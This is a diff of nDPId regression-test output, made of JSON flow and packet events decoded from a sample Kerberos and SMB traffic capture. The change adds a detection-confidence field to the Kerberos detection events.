-00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}}
+00710{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}}
 02405{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1498,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1498,"pkt_l4_len":1464,"ts_msec":1549337931220,"pkt":"AAgCHEeupB9ywglqCABFAAXME4FAAIAGeLmsEAgIrBAIyQBYwBgu4uDhNU2NClAYAQBUPQAAAAAFoG2CBZwwggWYoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIENGGCBDAwggQsoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHo4ID7DCCA+igAwIBEqEDAgECooID2gSCA9aIPBwtNxkshczHziSeGRCcSiSC82vdTNNxZoZEqctTILmi\/cPiWo2kj2ZowTM5BfoTzgngU5zy1dblxSYtNNDo790fqKeln68pSwduOA5ekfZ2omIpLyTKi1Uzi5unXScqqLz0hKSsn\/40+2FcuWZE3ZvPuCmZ8SKPEnuc921KBrNqOj\/0DryAdSyI8er0AkE463j84WxyAtyNQDKDrp2ez6929oR6Rx5hbvL8GdKQY9jCLD2rnICMW89Hj9rOupV1OeH78XxxB7MSKm499oGFFneF9SM8YJwXSSMV673PLXubFj6DMrikD2G0Sl6xic8MhWvEbY+QDRNnfGPZAJvMaahqCk8wVuJCt+fkFop+b4toNRK\/McSX15qS4Oue1FamxPlWb8yeZyA7zxXMdyv\/9YdFl51KW6DMdV\/gNQhWVbNsnpHVbk+dZ3hmZuA13vS+pCaVgYWcY8TsTrrqDHUdvkhYH5y6bQXhaba0hTe8Bpqjtkm6\/RTu4J\/\/NKiUQMb9AOVNXKtDTvIFCVxCzbgDhWofcnihAdfiq3GVUSfoJVIjvbiKN6rurAhxZ5G7eeGZ0k0F7hodA7NNCDg1db\/i3Z0nn0sEe0z7aNhzE0ribx16c5Vcg7SzYKcbmYr2SOlrqyDG2wBIue4c+yHf8w4ERFzFfLLBAoUF6TY9mRoNRbKB\/qSAwbDd52vGpnn87rIVg\/QNGVIwMeb1KKPfdaC4wum+6\/FhZgWd0DbrZEhIXl\/8HN6zG+3ywmGFdeC2DFCmO4dETOrfkL6fl3T\/7ku0etROu1j+k26SXEG6Gge01yPUKju51MrjdtHnDZ1Ss42MB0XlUT6U6S5TlEIP\/8k9d0krm1cn0oRERln+NBIaJS\/B2711LZddv4tje7ItSqfXLacjoI7g80JWdXjf4l7SPcZiNeEbp1dMmXrQFZcbRN17kosEr4Tm2W4friYde8+zbAKqoXvVJXbnxAUwEVAGcV\/iPptIl\/xW9mtB0WPhDmkKXm2SfL9rih8OBbowoKkOmIJqQw8CRJRncVK0szyJok+ajlBHDiJgpcZUT8EmfmEr0qJ0qoMeuCqxs8Kf3IstAtgMR7lMBZda98WMq0J06Prxf9X\/7Sw5XHFF0Ihx2VyWiVN3DmzgADoDdivNlyaD8+Octjfvk+ZwiZGCsRMD1d7AL6HjQzrju4nysDHJIjeaKR52nWtCWAZ87qog1mDH+qjQPdMGkDr1FGrVbBXAZcR0K17tOKTw9bgQg9LvLMWeDMDNCEwvA8GHdr\/fAsBPK3PDKVyht8oNdhjar8xKOZRvwzCOpoIBJjCCASKgAwIBEqKCARkEggEVYp6jTcDi\/gYVd9SDuEsi2VccBape1lXgcuGoeWG1ePxV5NidfJvDEi3F2VmdD04JFUaFb\/GRqNe9F8xWyy86xiJ3eKyJgAfyG7DDQnnFCeKC++4ORaBUkKnIeWwsFqQxh0aL1BrdknGP8u06G6P95r9esj7jUPDXQ1D0+jbs1WpWssKqZMQfUgV0eg9FoEGdVPsUmgNbZN2YPPrxhZ6CEgNOIC\/5aj8NqGMkPPX6xfYF4tbD74dZ3EfC4ry5KcIxNVYXU179as2C\/cihpEMrX8yiZtM91awDzQYUMPKt3\/3WSS96ycQo00pex7Pc1Jh3j49Cr5ckyWXD9SUXbCcOpUpip4\/Jz5Hvsliozjm5inKwUIBTJQ=="}
-00702{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
+00728{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931220,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"ts_msec":1549337931220,"pkt":"pB9ywglqAAgCHEeuCABFAAELAJhAAIAGkGOsEAjJrBAICMAWAb2ZMOb++YgxIFAYAP+McAAAQFskZ7b1ZYO5\/CuVOTe3ZqHs3nhqe1KXhnlBtJ\/qDgyo+sduQpC\/WLkmAdUvTJdV+CtGiwLoGf3Uio50ZE6gilnFEbzLLhzMIw4gwhRvlYwapNctw4G2EkpKfWO1MgMQ0yTGVxtfwAuP0ouYkDi\/6FI97AzDGvp\/R2LK19PAI403fVWk1Cbb2O\/YPOGH5a8hHowuR6tT8UugHDdGGl\/fWl8Wk4rCdi\/3gOYAhRVI6o2ZOHpv4GeBlLgJ6L2WL35O3jhh2e2dr0Fkd\/WG3ET2QLw9x3WRfncFn29f8nOqAUQDRH0="}
 00802{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1549337931221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"ts_msec":1549337931221,"pkt":"AAgCHEeupB9ywglqCABFAAEsE4VAAIAGfVWsEAgIrBAIyQG9wBb5iDEgmTDn4VAYAP9zWgAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAEAAAAAAAAA\/\/4AAAAAAABdAAAAAAQAAPvWvNgjH\/I48OPxOa5H7a4JAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbUswX\/mwh6g2ztwHi8\/dTRtvFzo0LVENq7tttT0JwVpKoIxijjsysss5HuCbI3DQGU7C0ILmrl+8phtVtu+2vBMSA9FKWe75R\/a+ST6oEaoDrDjzWfPqdU4xUCgD\/zK6J0O4Dsk+rO8nhy4LUmk="}
@@ -75,11 +77,12 @@
 00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1549337937701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"ts_msec":1549337937701,"pkt":"AAgCHEeupB9ywglqCABFAAD6E6JAAIAGfWqsEAgIrBAIyQGFwBxI3pNwglNt+lAYAQCvQgAAMIQAAADMAgEKYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG2EupGhqTVA+Kxm5vIdkbfFjlPoe8DmjpF\/p2I3j7EwFjqQzavz5jy+cGzZKn09a9y0dyj\/mpeHcqpjjORB3KYfxKGHrDmiKKSYiCwqx86ee7rLKiQPX2z3RSwNa4fWz8uAjgw+I5CkXYbP6rNu"}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00769{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"ts_msec":1549337937703,"pkt":"pB9ywglqAAgCHEeuCABFAAEXANlAAIAGkBasEAjJrBAICMAdAFjHhcaiuhdcXlAYAQCv5QAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkohAbDkhBUFBZQ1JBRlQuT1JHoyMwIaADAgECoRowGBsGa3JidGd0Gw5IQVBQWUNSQUZULk9SR6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBFIcW1KoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="}
-00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
+00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
 00819{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"ts_msec":1549337937703,"pkt":"AAgCHEeupB9ywglqCABFAAE+E6VAAIAGfSOsEAgIrBAIyQBYwB26F1xex4XHkVAYAQDp0AAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg1NlqlBQIDBJWNpgMCARmpEBsOSEFQUFlDUkFGVC5PUkeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="}
+00724{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":45,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"ts_msec":1549337937724,"pkt":"pB9ywglqAAgCHEeuCABFAAFnAN1AAIAGj8KsEAjJrBAICMAeAFgo\/29go\/Vk0VAYAQAVQgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4EwWkoanvLUiVA5eu8uG72\/EPy4+eHAiK9HbftleuqZ7DwBR\/wY3Sc5USTXPr6SJXdlLH8zfIE5MwEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLSk9ITlNPTi1QQySiEBsOSEFQUFlDUkFGVC5PUkejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIEUhxbUqgVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="}
-00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
+00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"ts_msec":1549337937724,"pkt":"AAgCHEeupB9ywglqCABFAACYE6pAAIAGfcSsEAgIrBAIyQBYwB6j9WqFKP9wn1AYAQCbeQAAeBxjGZR555TmhlGtfWdB3hqYo6lYswe6vKpNUcrN1M7KGcxMIdPLYhZ04dECjGI6ypolTWuvt884Bi2lq0pIFbZFVKD3x\/BnUesSWAB9L0qg+5NPzwAEggckaZSGKHdd5sXD0ux4MNvoyw986qY1Nw=="}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937725,"flow_last_seen":1549337937725,"flow_idle_time":7440000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":1,"ts_msec":1549337937725,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1549337937725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1549337937725,"pkt":"pB9ywglqAAgCHEeuCABFAAB4AONAAIAGkKusEAjJrBAICMAfAFi1TK\/3YmHJT1AYAQDj2wAAbj2wbk+derrxO0c0pxRSdruhR6\/j4Ui\/xNsBa8OfbfRkbAwdywbQynHUORFcFH8maukxsoLa+OhvD2a5+zDPKPlneJ\/sg2b\/GuIvr5ZD3Bg="}
@@ -93,11 +96,12 @@
 00751{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1549337940433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"ts_msec":1549337940433,"pkt":"pB9ywglqAAgCHEeuCABFAAEEAP9AAIAGkAOsEAjJrBAICMAhwAMZWx3nQJkKeFAYAP\/gGgAABQAOAxAAAADcAIwAAgAAANAW0BYAAAAAAQAAAAEAAQA1QlHjBkvREasEAMBPwtzSBAAAADMFcXG6vjdJgxm12++czDYBAAAACQYAAAAAAAChgYkwgYagAwoBAaJfBF1vWzBZoAMCAQWhAwIBD6JNMEugAwIBEqJEBELB6nut18jCMG03H8TJyLvCf8wWF6F7BqJ4bg85nSMTOiCmzGy+a5tNrq0VYdAt2TCIZ2p1Ys\/DpnWvcPxOp0LCSoajHgQcBAQE\/\/\/\/\/\/8AAAAAVL504MDCo+3fnXZuQhY33A=="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1549337951630,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"ts_msec":1549337951630,"pkt":"pB9ywglqAAgCHEeuCABFAAETAQ1AAIAGj+asEAjJrBAICMAjAFj9jJo6lSyMo1AYAQB4vAAAAAAA52qB5DCB4aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBvTCBuqAHAwUAQIEAEKEcMBqgAwIBAaETMBEbD3RoZXJlc2Euam9obnNvbqIMGwpIQVBQWUNSQUZUox8wHaADAgECoRYwFBsGa3JidGd0GwpIQVBQWUNSQUZUpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIEXdv8Z6gVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="}
-00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}}
+00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}}
 00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1549337951631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":294,"pkt_l4_len":260,"ts_msec":1549337951631,"pkt":"AAgCHEeupB9ywglqCABFAAEYE9dAAIAGfResEAgIrBAIyQBYwCOVLIyj\/YybJVAYAQAREAAAAAAA7H6B6TCB5qADAgEFoQMCAR6kERgPMjAxOTAyMDUwMzM5MTBapQUCAwNKZqYDAgEZqQwbCkhBUFBZQ1JBRlSqHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBUFBZQ1JBRlSsgYsEgYgwgYUwYqEDAgETolsEWTBXMCagAwIBEqEfGx1IQVBQWUNSQUZULk9SR3RoZXJlc2Euam9obnNvbjAFoAMCARcwJqADAgEDoR8bHUhBUFBZQ1JBRlQuT1JHdGhlcmVzYS5qb2huc29uMAmhAwIBAqICBAAwCaEDAgEQogIEADAJoQMCAQ+iAgQA"}
+00725{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951630,"flow_last_seen":1549337951631,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":237,"midstream":1,"ts_msec":1549337951631,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
